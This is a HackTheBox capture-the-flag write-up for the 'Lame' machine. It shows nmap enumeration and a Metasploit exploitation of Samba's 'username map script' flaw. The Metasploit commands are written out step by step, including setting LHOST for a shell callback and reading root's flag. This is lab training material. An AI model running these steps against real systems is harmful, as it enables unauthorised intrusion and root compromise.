Info

Lame is the first box ever created on HackTheBox. It’s an easy Linux-based machine created by ch4p.

Enumeration

Since this machine is retired and only VIP members can access it, I have a different machine IP. You can find the machine IP on that machine’s page. For this machine, you need basic Linux knowledge. As always, I start with network scanning to see which ports are open, which service versions are running, etc.

nmap -sC -sV 10.10.10.3
[Screenshot: Explanation for Parameters] (-sC runs nmap's default scripts; -sV detects service versions)
[Screenshot: Scanning Result]

Exploitation

In the scan result, we can see the FTP details, and anonymous login is allowed. The FTP version is also listed: “vsFTPd 2.3.4”. Googling it, I found VSFTPD v2.3.4 Backdoor Command Execution and tried to run it, but nothing happened. It might be a rabbit hole. After the attempt to get in through the vsFTPd attack vector, Samba becomes the only target. Googling it for an exploit, I clicked on the first result, Samba “username map script” Command Execution (Rapid7), and it’s exploitable with Metasploit. Also, the exploit version matches ours. So, I’ll run the Metasploit console and try this one.

msfconsole

And now, I’ll use the search command to find that exploit.

[Screenshot: Search Command in Metasploit Console]

Found it! Let’s use it as our exploit:

use exploit/multi/samba/usermap_script

Now that we have loaded our exploit, let’s take a look at the exploit options with the command:

show options
[Screenshot: Options for Exploit]

Okay, we have the options! Now, let’s set them properly. RHOSTS needs to be set to the machine IP. We shouldn’t change RPORT; it’s set to 139 by default. LHOST is our local machine IP, which is actually our VPN connection IP. You can check it by typing:

ifconfig
[Screenshot: Local Machine IP]

Your Local Machine IP (on HackTheBox) should start with 10.10.XX.XX. Now, we can set our LHOST in Metasploit Console to the Local Machine IP:

set LHOST 10.10.XX.XX

Now, let’s set RHOST (Machine IP):

set RHOST 10.129.159.5
[Screenshot: Exploit Options]

And now, let’s try to run it and see what happens. Use the command:

run

Wait a few seconds, and…

[Screenshot: Shell Session]

And we got it! Now we can grab our flags and submit them. On HTB Linux machines, the user flag is always in the user’s home directory (/home/username/user.txt) and the root flag is always in the root directory (/root/root.txt). To get the user flag, go into the /home directory, where you can see 4 users. I checked all of them, and only the user makis has a user.txt file. To get the root flag, simply read the file /root/root.txt.

[Screenshot: User & Root]

PWNED!

Thank you for reading this writeup.